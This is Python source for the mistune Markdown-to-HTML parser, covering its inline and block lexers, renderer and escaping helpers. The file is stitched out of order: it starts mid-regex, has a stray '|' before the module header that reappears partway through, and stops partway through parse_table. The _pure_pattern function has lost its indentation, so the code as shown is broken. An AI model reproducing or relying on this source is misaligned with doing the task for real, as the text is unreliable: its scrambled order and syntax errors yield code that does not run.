        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\('
        r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
        r'\)'
    )
    # [text][key] reference links.
    reflink = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\s*\[([^^\]]*)\]'
    )
    # [key] shortcut reference links.
    nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
    # Bare http(s) URLs.
    url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
    double_emphasis = re.compile(
        r'^_{2}([\s\S]+?)_{2}(?!_)'  # __word__
        r'|'
        r'^\*{2}([\s\S]+?)\*{2}(?!\*)'  # **word**
    )
    emphasis = re.compile(
        r'^\b_((?:__|[^_])+?)_\b'  # _word_
        r'|'
        r'^\*((?:\*\*|[^\*])+?)\*(?!\*)'  # *word*
    )
    code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)')  # `code`
    # Hard line break: two trailing spaces before the newline.
    linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
    strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~')  # ~~word~~
    footnote = re.compile(r'^\[\^([^\]]+)\]')
    # Plain text up to the next potential inline marker.
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')

    def hard_wrap(self):
        """Grammar for hard wrap linebreak. You don't need to add two
        spaces at the end of a line.
        """
        self.linebreak = re.compile(r'^ *\n(?!\s*$)')
        self.text = re.compile(
            r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
        )
class InlineLexer(object):
    """Inline level lexer for inline grammars.

    Matches inline rules against the text and feeds each match to the
    renderer; the renderer outputs are accumulated and returned.
    """
    grammar_class = InlineGrammar

    # Rule names tried in order.
    default_rules = [
        'escape', 'inline_html', 'autolink', 'url',
        'footnote', 'link', 'reflink', 'nolink',
        'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]
    # Restricted set used while re-parsing the body of an inline HTML tag
    # (no nested raw HTML or footnotes).
    inline_html_rules = [
        'escape', 'autolink', 'url', 'link', 'reflink',
        'nolink', 'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]

    def __init__(self, renderer, rules=None, **kwargs):
        self.renderer = renderer
        self.links = {}
        self.footnotes = {}
        self.footnote_index = 0
        if not rules:
            rules = self.grammar_class()
        # Renderer options take precedence over constructor kwargs.
        kwargs.update(self.renderer.options)
        if kwargs.get('hard_wrap'):
            rules.hard_wrap()
        self.rules = rules
        # State flags used to suppress nested links/footnotes.
        self._in_link = False
        self._in_footnote = False
        self._parse_inline_html = kwargs.get('parse_inline_html')

    def __call__(self, text, rules=None):
        return self.output(text, rules)

    def setup(self, links, footnotes):
        """Install the definitions collected by the block lexer."""
        self.footnote_index = 0
        self.links = links or {}
        self.footnotes = footnotes or {}

    def output(self, text, rules=None):
        """Render *text* by repeatedly applying the inline rules."""
        text = text.rstrip('\n')
        if not rules:
            rules = list(self.default_rules)
        # Footnote references are not allowed inside footnote bodies.
        if self._in_footnote and 'footnote' in rules:
            rules.remove('footnote')
        output = self.renderer.placeholder()

        def manipulate(text):
            # First matching rule whose handler returns non-None wins.
            for key in rules:
                pattern = getattr(self.rules, key)
                m = pattern.match(text)
                if not m:
                    continue
                self.line_match = m
                out = getattr(self, 'output_%s' % key)(m)
                if out is not None:
                    return m, out
            return False  # pragma: no cover

        while text:
            ret = manipulate(text)
            if ret is not False:
                m, out = ret
                output += out
                text = text[len(m.group(0)):]
                continue
            if text:  # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)
        return output

    def output_escape(self, m):
        text = m.group(1)
        return self.renderer.escape(text)

    def output_autolink(self, m):
        link = m.group(1)
        # Group 2 is the '@' or ':' separator; '@' means an email link.
        if m.group(2) == '@':
            is_email = True
        else:
            is_email = False
        return self.renderer.autolink(link, is_email)

    def output_url(self, m):
        link = m.group(1)
        if self._in_link:
            # No links inside links: render as plain text.
            return self.renderer.text(link)
        return self.renderer.autolink(link, False)

    def output_inline_html(self, m):
        tag = m.group(1)
        if self._parse_inline_html and tag in _inline_tags:
            # Recursively render markdown inside the tag body.
            text = m.group(3)
            if tag == 'a':
                self._in_link = True
                text = self.output(text, rules=self.inline_html_rules)
                self._in_link = False
            else:
                text = self.output(text, rules=self.inline_html_rules)
            extra = m.group(2) or ''
            html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        else:
            html = m.group(0)
        return self.renderer.inline_html(html)

    def output_footnote(self, m):
        key = _keyify(m.group(1))
        if key not in self.footnotes:
            return None
        if self.footnotes[key]:
            # Each footnote may only be referenced once.
            return None
        self.footnote_index += 1
        self.footnotes[key] = self.footnote_index
        return self.renderer.footnote_ref(key, self.footnote_index)

    def output_link(self, m):
        return self._process_link(m, m.group(3), m.group(4))

    def output_reflink(self, m):
        # [text][key]; an empty key falls back to the link text.
        key = _keyify(m.group(2) or m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def output_nolink(self, m):
        key = _keyify(m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def _process_link(self, m, link, title=None):
        """Render a link or (when prefixed with '!') an image."""
        line = m.group(0)
        text = m.group(1)
        if line[0] == '!':
            return self.renderer.image(link, title, text)
        self._in_link = True
        text = self.output(text)
        self._in_link = False
        return self.renderer.link(link, title, text)

    def output_double_emphasis(self, m):
        # Group 1 is the '__' variant, group 2 the '**' variant.
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.double_emphasis(text)

    def output_emphasis(self, m):
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.emphasis(text)

    def output_code(self, m):
        text = m.group(2)
        return self.renderer.codespan(text)

    def output_linebreak(self, m):
        return self.renderer.linebreak()

    def output_strikethrough(self, m):
        text = self.output(m.group(1))
        return self.renderer.strikethrough(text)

    def output_text(self, m):
        text = m.group(0)
        return self.renderer.text(text)
class Renderer(object):
    """The default HTML renderer for rendering Markdown.
    """
    def __init__(self, **kwargs):
        # Keep every keyword option; feature checks read them lazily.
        self.options = kwargs
    def placeholder(self):
        """Returns the default, empty output value for the renderer.
        All renderer methods use the '+=' operator to append to this value.
        Default is a string so rendering HTML can build up a result string with
        the rendered Markdown.
        Can be overridden by Renderer subclasses to be types like an empty
        list, allowing the renderer to create a tree-like structure to
        represent the document (which can then be reprocessed later into a
        separate format like docx or pdf).
        """
        return ''
    def block_code(self, code, lang=None):
        """Rendering block level code. ``pre > code``.
        :param code: text content of the code block.
        :param lang: language of the given code.
        """
        body = code.rstrip('\n')
        if lang:
            body = escape(body, quote=True, smart_amp=False)
            return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (
                lang, body
            )
        body = escape(body, smart_amp=False)
        return '<pre><code>%s\n</code></pre>\n' % body
    def block_quote(self, text):
        """Rendering <blockquote> with the given text.
        :param text: text content of the blockquote.
        """
        return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')
    def block_html(self, html):
        """Rendering block level pure html content.
        :param html: text content of the html snippet.
        """
        skip = self.options.get('skip_style')
        if skip and html.lower().startswith('<style'):
            return ''
        return escape(html) if self.options.get('escape') else html
    def header(self, text, level, raw=None):
        """Rendering header/heading tags like ``<h1>`` ``<h2>``.
        :param text: rendered text content for the header.
        :param level: a number for the header level, for example: 1.
        :param raw: raw text content of the header.
        """
        tag = 'h%d' % level
        return '<%s>%s</%s>\n' % (tag, text, tag)
    def hrule(self):
        """Rendering method for ``<hr>`` tag."""
        return '<hr />\n' if self.options.get('use_xhtml') else '<hr>\n'
    def list(self, body, ordered=True):
        """Rendering list tags like ``<ul>`` and ``<ol>``.
        :param body: body contents of the list.
        :param ordered: whether this list is ordered or not.
        """
        tag = 'ol' if ordered else 'ul'
        return '<%s>\n%s</%s>\n' % (tag, body, tag)
    def list_item(self, text):
        """Rendering list item snippet. Like ``<li>``."""
        return '<li>%s</li>\n' % text
    def paragraph(self, text):
        """Rendering paragraph tags. Like ``<p>``."""
        return '<p>%s</p>\n' % text.strip(' ')
    def table(self, header, body):
        """Rendering table element. Wrap header and body in it.
        :param header: header part of the table.
        :param body: body part of the table.
        """
        template = (
            '<table>\n<thead>%s</thead>\n'
            '<tbody>\n%s</tbody>\n</table>\n'
        )
        return template % (header, body)
    def table_row(self, content):
        """Rendering a table row. Like ``<tr>``.
        :param content: content of current table row.
        """
        return '<tr>\n%s</tr>\n' % content
    def table_cell(self, content, **flags):
        """Rendering a table cell. Like ``<th>`` ``<td>``.
        :param content: content of current table cell.
        :param header: whether this is header or not.
        :param align: align of current table cell.
        """
        tag = 'th' if flags['header'] else 'td'
        align = flags['align']
        if align:
            return '<%s style="text-align:%s">%s</%s>\n' % (
                tag, align, content, tag
            )
        return '<%s>%s</%s>\n' % (tag, content, tag)
    def double_emphasis(self, text):
        """Rendering **strong** text.
        :param text: text content for emphasis.
        """
        return '<strong>%s</strong>' % text
    def emphasis(self, text):
        """Rendering *emphasis* text.
        :param text: text content for emphasis.
        """
        return '<em>%s</em>' % text
    def codespan(self, text):
        """Rendering inline `code` text.
        :param text: text content for inline code.
        """
        return '<code>%s</code>' % escape(text.rstrip(), smart_amp=False)
    def linebreak(self):
        """Rendering line break like ``<br>``."""
        return '<br />\n' if self.options.get('use_xhtml') else '<br>\n'
    def strikethrough(self, text):
        """Rendering ~~strikethrough~~ text.
        :param text: text content for strikethrough.
        """
        return '<del>%s</del>' % text
    def text(self, text):
        """Rendering unformatted text.
        :param text: text content.
        """
        return text if self.options.get('parse_block_html') else escape(text)
    def escape(self, text):
        """Rendering escape sequence.
        :param text: text content.
        """
        return escape(text)
    def autolink(self, link, is_email=False):
        """Rendering a given link or email address.
        :param link: link content or email address.
        :param is_email: whether this is an email or not.
        """
        safe = escape_link(link)
        href = 'mailto:%s' % safe if is_email else safe
        return '<a href="%s">%s</a>' % (href, safe)
    def link(self, link, title, text):
        """Rendering a given link with content and title.
        :param link: href link for ``<a>`` tag.
        :param title: title content for `title` attribute.
        :param text: text content for description.
        """
        href = escape_link(link)
        if title:
            return '<a href="%s" title="%s">%s</a>' % (
                href, escape(title, quote=True), text
            )
        return '<a href="%s">%s</a>' % (href, text)
    def image(self, src, title, text):
        """Rendering a image with title and text.
        :param src: source link of the image.
        :param title: title text of the image.
        :param text: alt text of the image.
        """
        href = escape_link(src)
        alt = escape(text, quote=True)
        if title:
            tag = '<img src="%s" alt="%s" title="%s"' % (
                href, alt, escape(title, quote=True)
            )
        else:
            tag = '<img src="%s" alt="%s"' % (href, alt)
        closing = ' />' if self.options.get('use_xhtml') else '>'
        return tag + closing
    def inline_html(self, html):
        """Rendering span level pure html content.
        :param html: text content of the html snippet.
        """
        return escape(html) if self.options.get('escape') else html
    def newline(self):
        """Rendering newline element."""
        return ''
    def footnote_ref(self, key, index):
        """Rendering the ref anchor of a footnote.
        :param key: identity key for the footnote.
        :param index: the index count of current footnote.
        """
        safe = escape(key)
        return (
            '<sup class="footnote-ref" id="fnref-%s">'
            '<a href="#fn-%s">%d</a></sup>'
        ) % (safe, safe, index)
    def footnote_item(self, key, text):
        """Rendering a footnote item.
        :param key: identity key for the footnote.
        :param text: text content of the footnote.
        """
        back = (
            '<a href="#fnref-%s" class="footnote">↩</a>'
        ) % escape(key)
        body = text.rstrip()
        if body.endswith('</p>'):
            # splice the back-reference inside the trailing paragraph
            body = re.sub(r'<\/p>$', r'%s</p>' % back, body)
        else:
            body = '%s<p>%s</p>' % (body, back)
        return '<li id="fn-%s">%s</li>\n' % (escape(key), body)
    def footnotes(self, text):
        """Wrapper for all footnotes.
        :param text: contents of all footnotes.
        """
        html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
        return html % (self.hrule(), text)
class Markdown(object):
    """The Markdown parser.
    :param renderer: An instance of ``Renderer``.
    :param inline: An inline lexer class or instance.
    :param block: A block lexer class or instance.
    """
    def __init__(self, renderer=None, inline=None, block=None, **kwargs):
        # Default renderer when none given; otherwise merge the renderer's
        # stored options into kwargs so the lexers share the configuration.
        if not renderer:
            renderer = Renderer(**kwargs)
        else:
            kwargs.update(renderer.options)
        self.renderer = renderer
        # ``inline``/``block`` may be classes (instantiated here) or instances.
        if inline and inspect.isclass(inline):
            inline = inline(renderer, **kwargs)
        if block and inspect.isclass(block):
            block = block(**kwargs)
        if inline:
            self.inline = inline
        else:
            self.inline = InlineLexer(renderer, **kwargs)
        self.block = block or BlockLexer(BlockGrammar())
        self.footnotes = []  # collected {'key': ..., 'text': ...} dicts
        self.tokens = []  # block-token stack consumed via pop()/peek()
        # detect if it should parse text in block html
        self._parse_block_html = kwargs.get('parse_block_html')
    def __call__(self, text):
        # Calling the parser is the same as parse().
        return self.parse(text)
    def render(self, text):
        """Render the Markdown text.
        :param text: markdown formatted text content.
        """
        return self.parse(text)
    def parse(self, text):
        """Parse *text* and return the rendered output.
        Resets link/footnote definition state afterwards so the instance can
        be reused, then appends referenced footnotes to the output.
        """
        out = self.output(preprocessing(text))
        keys = self.block.def_footnotes
        # reset block
        self.block.def_links = {}
        self.block.def_footnotes = {}
        # reset inline
        self.inline.links = {}
        self.inline.footnotes = {}
        if not self.footnotes:
            return out
        # keep only footnotes that were actually referenced (index > 0),
        # and emit them in first-reference order
        footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
        self.footnotes = sorted(
            footnotes, key=lambda o: keys.get(o['key']), reverse=True
        )
        body = self.renderer.placeholder()
        while self.footnotes:
            note = self.footnotes.pop()
            body += self.renderer.footnote_item(
                note['key'], note['text']
            )
        out += self.renderer.footnotes(body)
        return out
    def pop(self):
        # Consume the next token (stack is reversed, so pop() advances).
        if not self.tokens:
            return None
        self.token = self.tokens.pop()
        return self.token
    def peek(self):
        # Look at the next token without consuming it.
        if self.tokens:
            return self.tokens[-1]
        return None  # pragma: no cover
    def output(self, text, rules=None):
        """Tokenize *text* with the block lexer and render every token."""
        self.tokens = self.block(text, rules)
        self.tokens.reverse()
        self.inline.setup(self.block.def_links, self.block.def_footnotes)
        out = self.renderer.placeholder()
        while self.pop():
            out += self.tok()
        return out
    def tok(self):
        """Render the current token by dispatching to ``output_<type>``."""
        t = self.token['type']
        # special case: '*_start' tokens share the handler of their base type
        if t.endswith('_start'):
            t = t[:-6]
        return getattr(self, 'output_%s' % t)()
    def tok_text(self):
        # Merge consecutive 'text' tokens before inline parsing.
        text = self.token['text']
        while self.peek()['type'] == 'text':
            text += '\n' + self.pop()['text']
        return self.inline(text)
    def output_newline(self):
        return self.renderer.newline()
    def output_hrule(self):
        return self.renderer.hrule()
    def output_heading(self):
        # Pass both the inline-rendered and the raw heading text.
        return self.renderer.header(
            self.inline(self.token['text']),
            self.token['level'],
            self.token['text'],
        )
    def output_code(self):
        return self.renderer.block_code(
            self.token['text'], self.token['lang']
        )
    def output_table(self):
        # Cells beyond the align row fall back to align=None.
        aligns = self.token['align']
        aligns_length = len(aligns)
        cell = self.renderer.placeholder()
        # header part
        header = self.renderer.placeholder()
        for i, value in enumerate(self.token['header']):
            align = aligns[i] if i < aligns_length else None
            flags = {'header': True, 'align': align}
            cell += self.renderer.table_cell(self.inline(value), **flags)
        header += self.renderer.table_row(cell)
        # body part
        body = self.renderer.placeholder()
        for i, row in enumerate(self.token['cells']):
            cell = self.renderer.placeholder()
            for j, value in enumerate(row):
                align = aligns[j] if j < aligns_length else None
                flags = {'header': False, 'align': align}
                cell += self.renderer.table_cell(self.inline(value), **flags)
            body += self.renderer.table_row(cell)
        return self.renderer.table(header, body)
    def output_block_quote(self):
        # Render nested tokens until the matching end marker.
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'block_quote_end':
            body += self.tok()
        return self.renderer.block_quote(body)
    def output_list(self):
        ordered = self.token['ordered']
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_end':
            body += self.tok()
        return self.renderer.list(body, ordered)
    def output_list_item(self):
        # Tight list item: bare text tokens are inline-parsed, not wrapped
        # in paragraphs.
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            if self.token['type'] == 'text':
                body += self.tok_text()
            else:
                body += self.tok()
        return self.renderer.list_item(body)
    def output_loose_item(self):
        # Loose list item: keep paragraph wrapping via tok().
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            body += self.tok()
        return self.renderer.list_item(body)
    def output_footnote(self):
        # Collect the footnote body; it is rendered at the end of parse().
        self.inline._in_footnote = True
        body = self.renderer.placeholder()
        key = self.token['key']
        while self.pop()['type'] != 'footnote_end':
            body += self.tok()
        self.footnotes.append({'key': key, 'text': body})
        self.inline._in_footnote = False
        return self.renderer.placeholder()
    def output_close_html(self):
        text = self.token['text']
        return self.renderer.block_html(text)
    def output_open_html(self):
        text = self.token['text']
        tag = self.token['tag']
        # Optionally parse markdown inside block HTML, except in pre-like tags.
        if self._parse_block_html and tag not in _pre_tags:
            text = self.inline(text, rules=self.inline.inline_html_rules)
        extra = self.token.get('extra') or ''
        html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        return self.renderer.block_html(html)
    def output_paragraph(self):
        return self.renderer.paragraph(self.inline(self.token['text']))
    def output_text(self):
        return self.renderer.paragraph(self.tok_text())
def markdown(text, escape=True, **kwargs):
    """Render markdown formatted text to html.
    :param text: markdown formatted text content.
    :param escape: if set to False, all html tags will not be escaped.
    :param use_xhtml: output with xhtml tags.
    :param hard_wrap: if set to True, it will use the GFM line breaks feature.
    :param parse_block_html: parse text only in block level html.
    :param parse_inline_html: parse text only in inline level html.
    """
    parser = Markdown(escape=escape, **kwargs)
    return parser(text)
| # coding: utf-8
"""
mistune
~~~~~~~
The fastest markdown parser in pure Python with renderer feature.
:copyright: (c) 2014 - 2017 by Hsiaoming Yang.
"""
import re
import inspect
__version__ = '0.8.1'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
# Public API of the module.
__all__ = [
    'BlockGrammar', 'BlockLexer',
    'InlineGrammar', 'InlineLexer',
    'Renderer', 'Markdown',
    'markdown', 'escape',
]
# Collapses runs of whitespace inside link/footnote keys (see _keyify).
_key_pattern = re.compile(r'\s+')
_nonalpha_pattern = re.compile(r'\W')
# Matches '&' that does not already start an HTML entity (smart amp escape).
_escape_pattern = re.compile(r'&(?!#?\w+;)')
# Normalizes CRLF / bare-CR line endings to LF (see preprocessing).
_newline_pattern = re.compile(r'\r\n|\r')
# Leading '> ' markers of blockquote lines.
_block_quote_leading_pattern = re.compile(r'^ *> ?', flags=re.M)
# Four-space indent that introduces an indented code block.
_block_code_leading_pattern = re.compile(r'^ {4}', re.M)
# Tags treated as span-level HTML (candidates for inline parsing).
_inline_tags = [
    'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
    'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
    'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
    'img', 'font',
]
# Tags whose content must never be re-parsed as markdown.
_pre_tags = ['pre', 'script', 'style']
# Regex fragments for recognizing HTML tag names and attributes.
_valid_end = r'(?!:/|[^\w\s@]*@)\b'
_valid_attr = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
# A block-level tag name: any word tag that is not one of _inline_tags.
_block_tag = r'(?!(?:%s)\b)\w+%s' % ('|'.join(_inline_tags), _valid_end)
# URL schemes rejected outright by escape_link().
_scheme_blacklist = ('javascript:', 'vbscript:')
def _pure_pattern(regex):
pattern = regex.pattern
if pattern.startswith('^'):
pattern = pattern[1:]
return pattern
def _keyify(key):
    """Normalize a link/footnote key: lowercase, escape, collapse whitespace."""
    return _key_pattern.sub(' ', escape(key.lower(), quote=True))
def escape(text, quote=False, smart_amp=True):
    """Replace special characters "&", "<" and ">" to HTML-safe sequences.
    The original cgi.escape will always escape "&", but you can control
    this one for a smart escape amp.
    :param quote: if set to True, " and ' will be escaped.
    :param smart_amp: if set to False, & will always be escaped.
    """
    # Fix: the replacement strings had been corrupted into self-replacements
    # (e.g. replacing '&' with '&', and an unterminated ''' literal for the
    # single quote); restore the proper HTML entities.
    if smart_amp:
        # only escape '&' that does not already start an entity like &amp;
        text = _escape_pattern.sub('&amp;', text)
    else:
        text = text.replace('&', '&amp;')
    text = text.replace('<', '&lt;')
    text = text.replace('>', '&gt;')
    if quote:
        text = text.replace('"', '&quot;')
        text = text.replace("'", '&#39;')
    return text
def escape_link(url):
    """Remove dangerous URL schemes like javascript: and escape afterwards."""
    cleaned = url.lower().strip('\x00\x1a \n\r\t')
    # Strip everything except alphanumerics, '/' and ':' before the scheme
    # check, so obfuscations like 'java\tscript:' are still caught.
    condensed = re.sub(r'[^A-Za-z0-9\/:]+', '', cleaned)
    if condensed.startswith(_scheme_blacklist):
        return ''
    return escape(url, quote=True, smart_amp=False)
def preprocessing(text, tab=4):
    """Normalize line endings and tabs, and blank out space-only lines."""
    normalized = re.sub(r'\r\n|\r', '\n', text)
    normalized = normalized.expandtabs(tab)
    normalized = normalized.replace('\u2424', '\n')
    # lines consisting only of spaces become empty lines
    return re.sub(r'^ +$', '', normalized, flags=re.M)
class BlockGrammar(object):
    """Grammars for block level tokens."""
    # Link definitions: ``[key]: <link> "title"``.
    def_links = re.compile(
        r'^ *\[([^^\]]+)\]: *' # [key]:
        r'<?([^\s>]+)>?' # <link> or link
        r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
    )
    # Footnote definitions: ``[^key]: body`` with indented continuations.
    def_footnotes = re.compile(
        r'^\[\^([^\]]+)\]: *('
        r'[^\n]*(?:\n+|$)' # [^key]:
        r'(?: {1,}[^\n]*(?:\n+|$))*'
        r')'
    )
    newline = re.compile(r'^\n+')
    # Indented (4-space) code blocks.
    block_code = re.compile(r'^( {4}[^\n]+\n*)+')
    # Fenced code blocks delimited by ``` or ~~~.
    fences = re.compile(
        r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```lang
        r'([\s\S]+?)\s*'
        r'\1 *(?:\n+|$)' # ```
    )
    # Horizontal rules: three or more -, * or _.
    hrule = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
    # ATX headings: ``# heading``.
    heading = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
    # Setext headings: text underlined with = or -.
    lheading = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
    block_quote = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
    # A whole bullet/ordered list, terminated by hrule, definition or blank run.
    list_block = re.compile(
        r'^( *)([*+-]|\d+\.) [\s\S]+?'
        r'(?:'
        r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # hrule
        r'|\n+(?=%s)' # def links
        r'|\n+(?=%s)' # def footnotes
        r'|\n{2,}'
        r'(?! )'
        r'(?!\1(?:[*+-]|\d+\.) )\n*'
        r'|'
        r'\s*$)' % (
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
        )
    )
    # One list item including its continuation lines.
    list_item = re.compile(
        r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
        r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
        flags=re.M
    )
    list_bullet = re.compile(r'^ *(?:[*+-]|\d+\.) +')
    # Paragraph: lines not starting any other block construct.
    paragraph = re.compile(
        r'^((?:[^\n]+\n?(?!'
        r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
        r'))+)\n*' % (
            _pure_pattern(fences).replace(r'\1', r'\2'),
            _pure_pattern(list_block).replace(r'\1', r'\3'),
            _pure_pattern(hrule),
            _pure_pattern(heading),
            _pure_pattern(lheading),
            _pure_pattern(block_quote),
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
            '<' + _block_tag,
        )
    )
    # Block-level HTML: comment, paired tag, or self-closing tag.
    block_html = re.compile(
        r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
            r'<!--[\s\S]*?-->',
            r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (_block_tag, _valid_attr),
            r'<%s(?:%s)*?\s*\/?>' % (_block_tag, _valid_attr),
        )
    )
    # Pipe-delimited tables with a header separator row.
    table = re.compile(
        r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
    )
    # Tables without leading pipes.
    nptable = re.compile(
        r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
    )
    text = re.compile(r'^[^\n]+')
class BlockLexer(object):
    """Block level lexer for block grammars."""
    grammar_class = BlockGrammar
    # Rule names tried in order for top-level text.
    default_rules = [
        'newline', 'hrule', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'block_quote',
        'list_block', 'block_html', 'def_links',
        'def_footnotes', 'table', 'paragraph', 'text'
    ]
    # Restricted rule set used inside list items.
    list_rules = (
        'newline', 'block_code', 'fences', 'lheading', 'hrule',
        'block_quote', 'list_block', 'block_html', 'text',
    )
    # Rule set used inside footnote bodies.
    footnote_rules = (
        'newline', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'hrule', 'block_quote',
        'list_block', 'block_html', 'table', 'paragraph', 'text'
    )
    def __init__(self, rules=None, **kwargs):
        # tokens: flat token list produced by parse();
        # def_links / def_footnotes: definitions collected during lexing.
        self.tokens = []
        self.def_links = {}
        self.def_footnotes = {}
        if not rules:
            rules = self.grammar_class()
        self.rules = rules
    def __call__(self, text, rules=None):
        return self.parse(text, rules)
    def parse(self, text, rules=None):
        """Tokenize *text*, appending tokens to ``self.tokens``.
        Repeatedly tries each rule in order; the first matching rule's
        ``parse_<name>`` handler consumes the matched prefix.
        """
        text = text.rstrip('\n')
        if not rules:
            rules = self.default_rules
        def manipulate(text):
            # Try every rule against the start of the remaining text.
            for key in rules:
                rule = getattr(self.rules, key)
                m = rule.match(text)
                if not m:
                    continue
                getattr(self, 'parse_%s' % key)(m)
                return m
            return False # pragma: no cover
        while text:
            m = manipulate(text)
            if m is not False:
                text = text[len(m.group(0)):]
                continue
            if text: # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)
        return self.tokens
    def parse_newline(self, m):
        # A run of 2+ newlines becomes a 'newline' token; one is ignored.
        length = len(m.group(0))
        if length > 1:
            self.tokens.append({'type': 'newline'})
    def parse_block_code(self, m):
        # clean leading whitespace
        code = _block_code_leading_pattern.sub('', m.group(0))
        self.tokens.append({
            'type': 'code',
            'lang': None,
            'text': code,
        })
    def parse_fences(self, m):
        # Fenced code block with an optional language tag.
        self.tokens.append({
            'type': 'code',
            'lang': m.group(2),
            'text': m.group(3),
        })
    def parse_heading(self, m):
        # ATX heading; level is the number of '#'.
        self.tokens.append({
            'type': 'heading',
            'level': len(m.group(1)),
            'text': m.group(2),
        })
    def parse_lheading(self, m):
        """Parse setext heading."""
        self.tokens.append({
            'type': 'heading',
            'level': 1 if m.group(2) == '=' else 2,
            'text': m.group(1),
        })
    def parse_hrule(self, m):
        self.tokens.append({'type': 'hrule'})
    def parse_list_block(self, m):
        # Emit list_start/.../list_end around the items.
        bull = m.group(2)
        self.tokens.append({
            'type': 'list_start',
            'ordered': '.' in bull,
        })
        cap = m.group(0)
        self._process_list_item(cap, bull)
        self.tokens.append({'type': 'list_end'})
    def _process_list_item(self, cap, bull):
        """Split a list block into items and lex each item recursively."""
        cap = self.rules.list_item.findall(cap)
        _next = False
        length = len(cap)
        for i in range(length):
            item = cap[i][0]
            # remove the bullet
            space = len(item)
            item = self.rules.list_bullet.sub('', item)
            # outdent
            if '\n ' in item:
                space = space - len(item)
                pattern = re.compile(r'^ {1,%d}' % space, flags=re.M)
                item = pattern.sub('', item)
            # determine whether item is loose or not
            loose = _next
            if not loose and re.search(r'\n\n(?!\s*$)', item):
                loose = True
            rest = len(item)
            if i != length - 1 and rest:
                _next = item[rest-1] == '\n'
                if not loose:
                    loose = _next
            if loose:
                t = 'loose_item_start'
            else:
                t = 'list_item_start'
            self.tokens.append({'type': t})
            # recurse
            self.parse(item, self.list_rules)
            self.tokens.append({'type': 'list_item_end'})
    def parse_block_quote(self, m):
        self.tokens.append({'type': 'block_quote_start'})
        # clean leading >
        cap = _block_quote_leading_pattern.sub('', m.group(0))
        self.parse(cap)
        self.tokens.append({'type': 'block_quote_end'})
    def parse_def_links(self, m):
        # Record a link definition; emits no token.
        key = _keyify(m.group(1))
        self.def_links[key] = {
            'link': m.group(2),
            'title': m.group(3),
        }
    def parse_def_footnotes(self, m):
        """Record a footnote definition and lex its (dedented) body."""
        key = _keyify(m.group(1))
        if key in self.def_footnotes:
            # footnote is already defined
            return
        self.def_footnotes[key] = 0
        self.tokens.append({
            'type': 'footnote_start',
            'key': key,
        })
        text = m.group(2)
        if '\n' in text:
            lines = text.split('\n')
            whitespace = None
            for line in lines[1:]:
                space = len(line) - len(line.lstrip())
                if space and (not whitespace or space < whitespace):
                    whitespace = space
            newlines = [lines[0]]
            for line in lines[1:]:
                newlines.append(line[whitespace:])
            text = '\n'.join(newlines)
        self.parse(text, self.footnote_rules)
        self.tokens.append({
            'type': 'footnote_end',
            'key': key,
        })
    def parse_table(self, m):
        # Piped table: strip outer pipes, then split cells per row.
        item = self._process_table(m)
        cells = re.sub(r'(?: *\| *)?\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            v = re.sub(r'^ *\| *| *\| *$', '', v)
